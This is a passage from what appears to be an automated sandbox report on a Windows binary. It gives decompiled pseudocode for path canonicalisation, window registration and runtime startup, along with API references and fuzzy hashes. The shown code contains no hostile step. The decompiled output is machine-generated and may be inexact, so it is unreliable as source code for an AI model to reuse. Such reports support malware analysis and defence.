                                                  							_v8 = GetProcAddress(_a4, _t39);
                                                  						}
                                                  					}
                                                  				}
                                                  				LocalFree(_t39);
                                                  				goto L6;
                                                  			}


                                                  APIs
                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000001,?,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000), ref: 00041C27
                                                  • LocalAlloc.KERNEL32(00000000,00000002,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C38
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000001,00000000,00000000,00000000,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?), ref: 00041C54
                                                  • lstrlenA.KERNEL32(00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C5F
                                                  • GetProcAddress.KERNEL32(?,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C79
                                                  • LocalFree.KERNEL32(00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C87
                                                  • GetProcAddress.KERNEL32(?,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00042157
                                                  • GetProcAddress.KERNEL32(?,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 0004216A
                                                  • _wtoi.MSVCRT ref: 00042397
                                                  • GetProcAddress.KERNEL32(?,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 000423A5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Locallstrlen$AllocByteCharFreeMultiWide_wtoi
                                                  • String ID:
                                                  • API String ID: 2554484480-0
                                                  • Opcode ID: 8309fffa9f999e578165bcf3b45a9dd69c78264fc7a57308971e7e52311094da
                                                  • Instruction ID: b0f8e73b7755195723cb89846d9a0cbdbf842b29272f52a5b11a530ae5137848
                                                  • Opcode Fuzzy Hash: 8309fffa9f999e578165bcf3b45a9dd69c78264fc7a57308971e7e52311094da
                                                  • Instruction Fuzzy Hash: C3218DF9900245FFDB209F64CD889AABBECEF09355B104469F945D7220D7B4DD80DB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E00043168(void* __ecx, short* _a4, char _a8, wchar_t* _a12, signed int _a16) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _t121;
                                                  				intOrPtr _t124;
                                                  				signed int _t125;
                                                  				int _t128;
                                                  				intOrPtr* _t131;
                                                  				signed int _t136;
                                                  				short _t138;
                                                  				short _t140;
                                                  				intOrPtr* _t142;
                                                  				signed int _t155;
                                                  				wchar_t* _t156;
                                                  				wchar_t* _t157;
                                                  				intOrPtr _t163;
                                                  				signed int _t164;
                                                  				wchar_t* _t166;
                                                  				signed int _t170;
                                                  				intOrPtr _t171;
                                                  				signed int _t175;
                                                  				intOrPtr _t182;
                                                  				int _t185;
                                                  				short* _t190;
                                                  				wchar_t* _t192;
                                                  				signed int _t195;
                                                  				void* _t196;
                                                  				signed int _t197;
                                                  				intOrPtr _t198;
                                                  				intOrPtr _t199;
                                                  				signed int _t201;
                                                  				long _t203;
                                                  				void* _t208;
                                                  				void* _t209;
                                                  				long* _t211;
                                                  				wchar_t* _t214;
                                                  				char _t216;
                                                  				void* _t218;
                                                  				short* _t220;
                                                  				signed int _t221;
                                                  
                                                  				_t190 = _a4;
                                                  				_t216 = _a8;
                                                  				_v20 = 0;
                                                  				_t121 = E00041AE1(_t190, _t216, E00041460);
                                                  				_v8 = _t121;
                                                  				if(_t121 < 0) {
                                                  					L113:
                                                  					return _t121;
                                                  				} else {
                                                  					if(_t216 > 0x8000) {
                                                  						return 0x80070057;
                                                  					}
                                                  					if(_t216 <= 0x104) {
                                                  						_a16 = _a16 & 0xfffffffe;
                                                  					}
                                                  					_t195 = _a16 & 0x00000001;
                                                  					_v16 = _t195;
                                                  					if(_t195 == 0 && _t216 > 0x104) {
                                                  						_t216 = 0x104;
                                                  						_a8 = 0x104;
                                                  					}
                                                  					_v12 = _t216;
                                                  					_t124 = E00042D2E(_a12,  &_v24);
                                                  					_v28 = _t124;
                                                  					if(_t124 == 0) {
                                                  						_t214 = _a12;
                                                  						_t217 = L"\\\\?\\";
                                                  						_a16 = _t190;
                                                  						_t125 = E00042815(_t214, L"\\\\?\\", 4);
                                                  						_v24 = _t125;
                                                  						if(_t125 == 0) {
                                                  							_t128 = iswalpha( *_t214 & 0x0000ffff);
                                                  							_pop(_t196);
                                                  							if(_t128 != 0 && _t214[0] == 0x3a) {
                                                  								_v24 = 1;
                                                  							}
                                                  						} else {
                                                  							_t192 =  &(_t214[2]);
                                                  							_t185 = iswalpha( *_t192 & 0x0000ffff);
                                                  							_pop(_t196);
                                                  							if(_t185 == 0 || _t214[2] != 0x3a) {
                                                  								_v24 = _v24 & 0x00000000;
                                                  							} else {
                                                  								_t214 = _t192;
                                                  							}
                                                  							_t190 = _a4;
                                                  						}
                                                  						if(_v16 == 0) {
                                                  							goto L32;
                                                  						} else {
                                                  							if(_v24 == 0) {
                                                  								goto L26;
                                                  							}
                                                  							_v20 = 4;
                                                  							_t182 = E00042A67(_t196, _t190, _a8, _t217,  &_a16,  &_v12, 0);
                                                  							goto L25;
                                                  						}
                                                  					} else {
                                                  						_push(0);
                                                  						_push( &_v12);
                                                  						_push( &_a16);
                                                  						if(_v16 == 0) {
                                                  							_push(L"\\\\");
                                                  						} else {
                                                  							_v20 = 6;
                                                  							_push(L"\\\\?\\UNC\\");
                                                  						}
                                                  						_push(_t216);
                                                  						_push(_t190);
                                                  						_t182 = E00042A67(_t195);
                                                  						_t214 = _v24;
                                                  						L25:
                                                  						_v8 = _t182;
                                                  						L26:
                                                  						if(_v16 != 0) {
                                                  							_t175 = _v20;
                                                  							if(_t175 != 0 && _a8 <= _t175 + 0x104) {
                                                  								if(_a8 > 0x104) {
                                                  									_a8 = 0x104;
                                                  								}
                                                  								_t214 = _a12;
                                                  								_v20 = _v20 & 0x00000000;
                                                  								_v12 = _a8;
                                                  								_a16 = _t190;
                                                  								_v8 = E00041AE1(_t190, _a8, E00041460);
                                                  							}
                                                  						}
                                                  						L32:
                                                  						if(_v8 < 0) {
                                                  							L79:
                                                  							E00041AE1(_t190, _a8, E00041460);
                                                  							_t121 = _v8;
                                                  							if(_t121 != 0x8007007a) {
                                                  								goto L113;
                                                  							}
                                                  							if(_v16 != 0) {
                                                  								L83:
                                                  								if(_a8 != 0x8000) {
                                                  									goto L113;
                                                  								}
                                                  								L84:
                                                  								return 0x800700ce;
                                                  							}
                                                  							if(_a8 == 0x104) {
                                                  								goto L84;
                                                  							}
                                                  							if(_v16 == 0) {
                                                  								goto L113;
                                                  							}
                                                  							goto L83;
                                                  						}
                                                  						while( *_t214 != 0) {
                                                  							_t156 = wcschr(_t214, 0x5c);
                                                  							_pop(_t203);
                                                  							_a12 = _t156;
                                                  							if(_t156 == 0) {
                                                  								_t157 = _t214;
                                                  								_t211 =  &(_t157[0]);
                                                  								do {
                                                  									_t203 =  *_t157;
                                                  									_t157 =  &(_t157[0]);
                                                  								} while (_t203 != 0);
                                                  								_t221 = _t157 - _t211 >> 1;
                                                  								L39:
                                                  								if(_t221 <= 0x100 || _v16 != 0) {
                                                  									if(_t221 >= 0x8000) {
                                                  										goto L76;
                                                  									}
                                                  									if(_t221 != 1) {
                                                  										if(_t221 != 2) {
                                                  											if(_t221 == 0 &&  *_t214 == 0x5c) {
                                                  												_t221 = _t221 + 1;
                                                  											}
                                                  											L63:
                                                  											_t163 = E00042B88(_t203, _a16, _v12, _t214, _t221,  &_a16,  &_v12, 0);
                                                  											_v8 = _t163;
                                                  											if(_t163 != 0x8007007a || _t221 != 1 ||  *_t214 != 0x5c) {
                                                  												L73:
                                                  												_t214 = _t214 + _t221 * 2;
                                                  												L74:
                                                  												if(_v8 < 0) {
                                                  													break;
                                                  												}
                                                  												continue;
                                                  											} else {
                                                  												_t164 = _t214[0] & 0x0000ffff;
                                                  												if(_t164 == 0 || _t164 == 0x2e && _t214[1] == 0) {
                                                  													_v8 = 0;
                                                  													break;
                                                  												} else {
                                                  													if(_v12 == 1 && _t164 == 0x2e && _t214[1] == _t164) {
                                                  														_a16 = _a16 + 2;
                                                  														 *_a16 = 0;
                                                  														_v12 = 0;
                                                  														_v8 = 0;
                                                  													}
                                                  													goto L73;
                                                  												}
                                                  											}
                                                  										}
                                                  										if( *_t214 != 0x2e || _t214[0] != 0x2e) {
                                                  											goto L63;
                                                  										} else {
                                                  											if(_a16 <= _t190 || E00042DA5(_t190) != 0) {
                                                  												_t166 = _a12;
                                                  												if(_t166 != 0) {
                                                  													L45:
                                                  													_t214 =  &(_t166[0]);
                                                  													goto L74;
                                                  												}
                                                  												goto L59;
                                                  											} else {
                                                  												_t170 = E0004286E(_t190, _a16 + 0xfffffffe);
                                                  												_a16 = _t170;
                                                  												_t171 = _a8;
                                                  												if(_t170 == 0) {
                                                  													_a16 = _t190;
                                                  												} else {
                                                  													_t171 = _t171 - (_a16 - _t190 >> 1);
                                                  												}
                                                  												_v12 = _t171;
                                                  												_v8 = E00041AE1(_a16, _t171, E00041460);
                                                  												L59:
                                                  												_t214 =  &(_t214[1]);
                                                  												goto L74;
                                                  											}
                                                  										}
                                                  									}
                                                  									if( *_t214 != 0x2e) {
                                                  										goto L63;
                                                  									}
                                                  									_t166 = _a12;
                                                  									if(_t166 == 0) {
                                                  										_t214 =  &(_t214[0]);
                                                  										if(_a16 > _t190 && E00042DA5(_t190) == 0) {
                                                  											_a16 = _a16 - 2;
                                                  											_v12 = _v12 + 1;
                                                  											_v8 = E00041AE1(_a16, _v12, E00041460);
                                                  										}
                                                  										goto L74;
                                                  									}
                                                  									goto L45;
                                                  								} else {
                                                  									L76:
                                                  									_v8 = 0x800700ce;
                                                  									goto L79;
                                                  								}
                                                  							}
                                                  							_t221 = _t156 - _t214 >> 1;
                                                  							goto L39;
                                                  						}
                                                  						if(_v8 >= 0) {
                                                  							_t197 = _a16;
                                                  							if(_t197 <= _t190) {
                                                  								L92:
                                                  								_t131 = _t190;
                                                  								_t208 = _t131 + 2;
                                                  								do {
                                                  									_t198 =  *_t131;
                                                  									_t131 = _t131 + 2;
                                                  								} while (_t198 != 0);
                                                  								_t218 = _t190 + (_t131 - _t208 >> 1) * 2;
                                                  								if(_t218 >= _t190 + 0xe) {
                                                  									_t220 = _t218 - 0xe;
                                                  									if(E00042815(_t220, L"::$DATA", 7) != 0) {
                                                  										 *_t220 = 0;
                                                  									}
                                                  								}
                                                  								_t136 = _v20;
                                                  								if(_t136 == 0) {
                                                  									L105:
                                                  									if(_a8 > 1 &&  *_t190 == 0) {
                                                  										_t140 = 0x5c;
                                                  										 *_t190 = _t140;
                                                  										 *((short*)(_t190 + 2)) = 0;
                                                  									}
                                                  									if(_a8 > 3 &&  *((short*)(_t190 + 2)) == 0x3a &&  *((intOrPtr*)(_t190 + 4)) == 0) {
                                                  										_t138 = 0x5c;
                                                  										 *((short*)(_t190 + 4)) = _t138;
                                                  										 *((short*)(_t190 + 6)) = 0;
                                                  									}
                                                  									return 0;
                                                  								} else {
                                                  									_t142 = _t190 + _t136 * 2;
                                                  									_t209 = _t142 + 2;
                                                  									do {
                                                  										_t199 =  *_t142;
                                                  										_t142 = _t142 + 2;
                                                  									} while (_t199 != 0);
                                                  									if(_t142 - _t209 >> 1 < 0x104) {
                                                  										if(_v28 == 0) {
                                                  											_push(_t190 + 8);
                                                  											_push(_a8);
                                                  											_push(_t190);
                                                  										} else {
                                                  											_push(_t190 + 0x10);
                                                  											_push(_a8 + 0xfffffffe);
                                                  											_push(_t190 + 4);
                                                  										}
                                                  										E00041AE1();
                                                  									}
                                                  									goto L105;
                                                  								}
                                                  							}
                                                  							_t201 = _t197;
                                                  							if( *_t201 != 0x2e) {
                                                  								goto L92;
                                                  							}
                                                  							while(_t201 != _t190) {
                                                  								_t155 = _t201 - 2;
                                                  								if( *_t155 == 0x2a) {
                                                  									goto L92;
                                                  								}
                                                  								 *_t201 = 0;
                                                  								_t201 = _t155;
                                                  								if( *_t155 != 0x2e) {
                                                  									goto L92;
                                                  								}
                                                  							}
                                                  							 *_t201 = 0;
                                                  							goto L92;
                                                  						}
                                                  						goto L79;
                                                  					}
                                                  				}
                                                  			}
                                                  0x000435a2
                                                  0x000435a2
                                                  0x000435aa
                                                  0x000435bb
                                                  0x000435bc
                                                  0x000435c2
                                                  0x000435c2
                                                  0x00000000
                                                  0x00043551
                                                  0x00043551
                                                  0x00043554
                                                  0x00043557
                                                  0x00043557
                                                  0x0004355b
                                                  0x0004355c
                                                  0x0004356a
                                                  0x0004356f
                                                  0x00043585
                                                  0x00043586
                                                  0x00043589
                                                  0x00043571
                                                  0x00043574
                                                  0x0004357b
                                                  0x0004357f
                                                  0x0004357f
                                                  0x0004358a
                                                  0x0004358a
                                                  0x00000000
                                                  0x0004356a
                                                  0x0004354f
                                                  0x000434ea
                                                  0x000434ef
                                                  0x00000000
                                                  0x00000000
                                                  0x000434f1
                                                  0x000434f5
                                                  0x000434fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00043500
                                                  0x00043507
                                                  0x00043509
                                                  0x00000000
                                                  0x00000000
                                                  0x0004350b
                                                  0x0004350f
                                                  0x00000000
                                                  0x0004350f
                                                  0x00000000
                                                  0x00043494
                                                  0x000431dc

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: wcschr
                                                  • String ID: ::$DATA$\\?\$\\?\UNC\
                                                  • API String ID: 1497570035-1379090233
                                                  • Opcode ID: d44fba7d4069bc1d454337cf674527ccc8018e06ebf61db4a8599c44175aa768
                                                  • Instruction ID: a8609f12e551c6e1e949f85175b2fd9e1077aac611f8776b343663bb038b8a41
                                                  • Opcode Fuzzy Hash: d44fba7d4069bc1d454337cf674527ccc8018e06ebf61db4a8599c44175aa768
                                                  • Instruction Fuzzy Hash: 2AE18DF190020AEADF61DF64C945AEEB7F4EF44314F14A07AE915AB180E7B49F80CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00042FD3(void* __ebx, wchar_t* _a4, signed int* _a8) {
                                                  				signed int* _t16;
                                                  				int _t19;
                                                  				int _t20;
                                                  				int _t22;
                                                  				signed short* _t25;
                                                  				wchar_t* _t27;
                                                  				intOrPtr* _t32;
                                                  				wchar_t* _t37;
                                                  				wchar_t* _t39;
                                                  				int _t43;
                                                  				int _t46;
                                                  				long* _t47;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				intOrPtr* _t50;
                                                  				signed short* _t51;
                                                  				signed short* _t52;
                                                  
                                                  				_t51 = _a4;
                                                  				if(_t51 == 0 ||  *_t51 == 0) {
                                                  					L28:
                                                  					return 0x80070057;
                                                  				} else {
                                                  					_t16 = _a8;
                                                  					if(_t16 == 0) {
                                                  						goto L28;
                                                  					}
                                                  					 *_t16 =  *_t16 & 0x00000000;
                                                  					if(E00042D2E(_t51,  &_a4) == 0) {
                                                  						_t49 = 0x5c;
                                                  						__eflags =  *_t51 - _t49;
                                                  						if(__eflags != 0) {
                                                  							L19:
                                                  							_t19 = E00042963(__eflags, _t51);
                                                  							__eflags = _t19;
                                                  							if(_t19 == 0) {
                                                  								_t20 = E00042815(_t51, L"\\\\?\\", 4);
                                                  								__eflags = _t20;
                                                  								if(_t20 != 0) {
                                                  									_t51 =  &(_t51[4]);
                                                  									__eflags = _t51;
                                                  								}
                                                  								_t22 = iswalpha( *_t51 & 0x0000ffff);
                                                  								__eflags = _t22;
                                                  								if(_t22 == 0) {
                                                  									goto L28;
                                                  								} else {
                                                  									__eflags = _t51[1] - 0x3a;
                                                  									if(_t51[1] != 0x3a) {
                                                  										goto L28;
                                                  									}
                                                  									_t52 =  &(_t51[2]);
                                                  									__eflags = _t52;
                                                  									L26:
                                                  									__eflags =  *_t52 - _t49;
                                                  									if( *_t52 == _t49) {
                                                  										_t52 =  &(_t52[1]);
                                                  									}
                                                  									L9:
                                                  									 *_a8 = _t52;
                                                  									return 0;
                                                  								}
                                                  							}
                                                  							_t52 =  &(_t51[0x30]);
                                                  							goto L26;
                                                  						}
                                                  						_t25 =  &(_t51[1]);
                                                  						__eflags =  *_t25 - _t49;
                                                  						if(__eflags == 0) {
                                                  							goto L19;
                                                  						}
                                                  						_t52 = _t25;
                                                  						goto L9;
                                                  					}
                                                  					_t37 = _a4;
                                                  					_t50 = wcschr(_t37, 0x5c);
                                                  					if(_t50 == 0) {
                                                  						_t27 = _t37;
                                                  						_t47 =  &(_t27[0]);
                                                  						do {
                                                  							_t43 =  *_t27;
                                                  							_t27 =  &(_t27[0]);
                                                  							__eflags = _t43;
                                                  						} while (_t43 != 0);
                                                  						_t52 = _t37 + (_t27 - _t47 >> 1) * 2;
                                                  						L8:
                                                  						goto L9;
                                                  					}
                                                  					_t5 = _t50 + 2; // 0x2
                                                  					_t39 = _t5;
                                                  					_t52 = wcschr(_t39, 0x5c);
                                                  					if(_t52 == 0) {
                                                  						_t32 = _t50;
                                                  						_t7 = _t32 + 2; // 0x2
                                                  						_t48 = _t7;
                                                  						do {
                                                  							_t46 =  *_t32;
                                                  							_t32 = _t32 + 2;
                                                  							__eflags = _t46;
                                                  						} while (_t46 != 0);
                                                  						_t52 = _t50 + (_t32 - _t48 >> 1) * 2;
                                                  					} else {
                                                  						if(_t52 != _t39) {
                                                  							_t52 =  &(_t52[1]);
                                                  						}
                                                  					}
                                                  					goto L8;
                                                  				}
                                                  			}

                                                  0x00042fd9
                                                  0x00042fdf
                                                  0x000430d5
                                                  0x00000000
                                                  0x00042fef
                                                  0x00042fef
                                                  0x00042ff4
                                                  0x00000000
                                                  0x00000000
                                                  0x00042ffa
                                                  0x00043009
                                                  0x00043077
                                                  0x00043078
                                                  0x0004307b
                                                  0x00043089
                                                  0x0004308a
                                                  0x0004308f
                                                  0x00043091
                                                  0x000430a0
                                                  0x000430a5
                                                  0x000430a7
                                                  0x000430a9
                                                  0x000430a9
                                                  0x000430a9
                                                  0x000430b0
                                                  0x000430b7
                                                  0x000430b9
                                                  0x00000000
                                                  0x000430bb
                                                  0x000430bb
                                                  0x000430c0
                                                  0x00000000
                                                  0x00000000
                                                  0x000430c2
                                                  0x000430c2
                                                  0x000430c5
                                                  0x000430c5
                                                  0x000430c8
                                                  0x000430cf
                                                  0x000430cf
                                                  0x00043039
                                                  0x0004303c
                                                  0x00000000
                                                  0x0004303e
                                                  0x000430b9
                                                  0x00043093
                                                  0x00000000
                                                  0x00043093
                                                  0x0004307d
                                                  0x00043080
                                                  0x00043083
                                                  0x00000000
                                                  0x00000000
                                                  0x00043085
                                                  0x00000000
                                                  0x00043085
                                                  0x00043012
                                                  0x0004301a
                                                  0x00043020
                                                  0x0004305d
                                                  0x0004305f
                                                  0x00043062
                                                  0x00043062
                                                  0x00043066
                                                  0x00043067
                                                  0x00043067
                                                  0x00043070
                                                  0x00043038
                                                  0x00000000
                                                  0x00043038
                                                  0x00043022
                                                  0x00043022
                                                  0x0004302a
                                                  0x00043030
                                                  0x00043045
                                                  0x00043047
                                                  0x00043047
                                                  0x0004304a
                                                  0x0004304a
                                                  0x0004304e
                                                  0x0004304f
                                                  0x0004304f
                                                  0x00043058
                                                  0x00043032
                                                  0x00043034
                                                  0x00043037
                                                  0x00043037
                                                  0x00043034
                                                  0x00000000
                                                  0x00043030

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: wcschr$iswalpha
                                                  • String ID: \\?\
                                                  • API String ID: 934781262-4282027825
                                                  • Opcode ID: 601c98e1c504085365d24cd4f536153462b02c21c5272e6ab7c0d8884e132c89
                                                  • Instruction ID: 22abc68bd6c7ac1ba254ea79a7b90ea34d52cb0957215b0c3ed14043b81e4cd4
                                                  • Opcode Fuzzy Hash: 601c98e1c504085365d24cd4f536153462b02c21c5272e6ab7c0d8884e132c89
                                                  • Instruction Fuzzy Hash: 563128B6A00612A7D7359E58CC20AAB73E8EF057A0B055236ED45DB180EB70DF458BE8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E000413B9(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                  				struct _WNDCLASSW _v44;
                                                  				struct HICON__* _t17;
                                                  				WCHAR* _t22;
                                                  				signed int _t23;
                                                  				struct HINSTANCE__* _t27;
                                                  
                                                  				_t23 = 9;
                                                  				_v44.style = 0;
                                                  				memset( &(_v44.lpfnWndProc), 0, _t23 << 2);
                                                  				_t27 = _a4;
                                                  				_v44.lpfnWndProc = E0004119B;
                                                  				_v44.hInstance = _t27;
                                                  				_v44.hIcon = LoadIconW(_t27, 0x64);
                                                  				_t17 = LoadCursorW(0, 0x7f00);
                                                  				_t22 = _a8;
                                                  				_v44.hCursor = _t17;
                                                  				_v44.hbrBackground = 6;
                                                  				_v44.cbWndExtra = 4;
                                                  				_v44.lpszClassName = _t22;
                                                  				RegisterClassW( &_v44);
                                                  				return CreateWindowExW(0x80, _t22, E00041460, 0, 0x80000000, 0x80000000, 0, 0, 0, 0, _t27, 0);
                                                  			}

                                                  0x000413c6
                                                  0x000413cb
                                                  0x000413d1
                                                  0x000413d3
                                                  0x000413d9
                                                  0x000413e0
                                                  0x000413ef
                                                  0x000413f2
                                                  0x000413f8
                                                  0x000413fb
                                                  0x00041402
                                                  0x00041409
                                                  0x00041410
                                                  0x00041413
                                                  0x0004143c

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Load$ClassCreateCursorIconRegisterWindow
                                                  • String ID:
                                                  • API String ID: 1446224504-0
                                                  • Opcode ID: 64e55a7f123f8c6a36339632ff1115c7e10e6b58f27e27d376b383aab0ea8445
                                                  • Instruction ID: 6f04c5dac1cc12910226d6a5b7da2546a3e18fc596e57815d6e728914db3750e
                                                  • Opcode Fuzzy Hash: 64e55a7f123f8c6a36339632ff1115c7e10e6b58f27e27d376b383aab0ea8445
                                                  • Instruction Fuzzy Hash: 88016DB6901219BBDB208F95DD49EDFBFBCEB4A750F104016F604A6140D2B45981CBF8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00041C9C() {
                                                  				signed int _t10;
                                                  				void* _t15;
                                                  				intOrPtr _t18;
                                                  				intOrPtr* _t19;
                                                  				signed int _t25;
                                                  				signed int _t26;
                                                  				void* _t28;
                                                  				intOrPtr _t32;
                                                  
                                                  				_t28 =  *0x40000 - 0x5a4d; // 0x5a4d
                                                  				if(_t28 != 0) {
                                                  					L8:
                                                  					_t10 = 0;
                                                  				} else {
                                                  					_t18 =  *0x4003c; // 0xd8
                                                  					_t1 = _t18 + 0x40000; // 0x4550
                                                  					_t19 = _t1;
                                                  					if( *_t19 != 0x4550) {
                                                  						goto L8;
                                                  					} else {
                                                  						_t25 =  *(_t19 + 0x18) & 0x0000ffff;
                                                  						if(_t25 != 0x10b) {
                                                  							if(_t25 != 0x20b ||  *((intOrPtr*)(_t19 + 0x84)) <= 0xe) {
                                                  								goto L8;
                                                  							} else {
                                                  								_t26 = 0;
                                                  								goto L5;
                                                  							}
                                                  						} else {
                                                  							if( *((intOrPtr*)(_t19 + 0x74)) <= 0xe) {
                                                  								goto L8;
                                                  							} else {
                                                  								_t26 = 0;
                                                  								_t32 =  *((intOrPtr*)(_t19 + 0xe8));
                                                  								L5:
                                                  								_t10 = _t26 & 0xffffff00 | _t32 != 0x00000000;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				 *0x45050 = _t10;
                                                  				__set_app_type(E00041D5E(2));
                                                  				 *0x4505c =  *0x4505c | 0xffffffff;
                                                  				 *0x45060 =  *0x45060 | 0xffffffff;
                                                  				 *(__p__fmode()) =  *0x453ac;
                                                  				 *(__p__commode()) =  *0x453a8;
                                                  				_t15 = E0004158B();
                                                  				if( *0x4539c == 0) {
                                                  					__setusermatherr(E0004158B);
                                                  				}
                                                  				E00041D46(_t15);
                                                  				return 0;
                                                  			}

                                                  0x00041ca1
                                                  0x00041ca8
                                                  0x00041d3d
                                                  0x00041d3d
                                                  0x00041cae
                                                  0x00041cae
                                                  0x00041cb3
                                                  0x00041cb3
                                                  0x00041cbf
                                                  0x00000000
                                                  0x00041cc1
                                                  0x00041cc1
                                                  0x00041ccb
                                                  0x0004250e
                                                  0x00000000
                                                  0x00042521
                                                  0x00042521
                                                  0x00000000
                                                  0x00042523
                                                  0x00041cd1
                                                  0x00041cd5
                                                  0x00000000
                                                  0x00041cd7
                                                  0x00041cd7
                                                  0x00041cd9
                                                  0x00041cdf
                                                  0x00041ce2
                                                  0x00041ce2
                                                  0x00041cd5
                                                  0x00041ccb
                                                  0x00041cbf
                                                  0x00041ce6
                                                  0x00041cf1
                                                  0x00041cf7
                                                  0x00041cfe
                                                  0x00041d13
                                                  0x00041d21
                                                  0x00041d23
                                                  0x00041d2f
                                                  0x00042533
                                                  0x00042539
                                                  0x00041d35
                                                  0x00041d3c

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: __p__commode__p__fmode__set_app_type
                                                  • String ID:
                                                  • API String ID: 3338496922-0
                                                  • Opcode ID: 1c3d11c2ee71ba087ac0526d9e852ee35804e4b2e6f73fee119df6b4d5019a1e
                                                  • Instruction ID: 51557f219e31836e181284bdbdc0d43086125486ae83a9855c219c378b0c3a7f
                                                  • Opcode Fuzzy Hash: 1c3d11c2ee71ba087ac0526d9e852ee35804e4b2e6f73fee119df6b4d5019a1e
                                                  • Instruction Fuzzy Hash: B1114CF8900A05CFE7689B20ED596E837A0BB02722F50457AE563861F2DB7888C0CF1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			/* Root-path check on a wide string (0x5c is L'\\'). Reading the branches below, it returns 1 for:
                                                  			   a lone L"\\"; a letter followed by the 3-unit string at E00042E84 (not resolved in this dump; a
                                                  			   3-unit compare that includes the terminator fits L":\\", i.e. an exact "X:\" root); the
                                                  			   extended-length prefix L"\\\\?\\" followed by that same drive form; a string E00042D2E accepts
                                                  			   whose remainder (returned through _a4) holds at most one non-trailing L'\\' (a \\server\share
                                                  			   root); or a string E00042963 accepts with L'\\' at index 0x30 and NUL at 0x31, which is exactly
                                                  			   the length of \\?\Volume{GUID}\. Everything else returns 0. E00042815 compares n wide characters
                                                  			   and is nonzero on match. The purpose stated here is inferred from the code; the report names none. */
                                                  			E00042DA5(signed short* _a4) {
                                                  				long _t12;
                                                  				int _t13;
                                                  				signed short* _t15;
                                                  				signed short* _t17;
                                                  				signed int _t24;
                                                  				signed short* _t30;
                                                  				void* _t32;
                                                  				void* _t33;
                                                  				signed short* _t34;
                                                  
                                                  				_t34 = _a4;
                                                  				if(_t34 == 0) {
                                                  					L21:
                                                  					__eflags = 0;
                                                  					return 0;
                                                  				}
                                                  				_t12 =  *_t34 & 0x0000ffff;
                                                  				if(_t12 == 0) {
                                                  					goto L21;
                                                  				}
                                                  				_t13 = iswalpha(_t12);
                                                  				_t33 = E00042E84;
                                                  				if(_t13 == 0 || E00042815( &(_t34[1]), E00042E84, 3) == 0) {
                                                  					__eflags =  *_t34 - 0x5c;
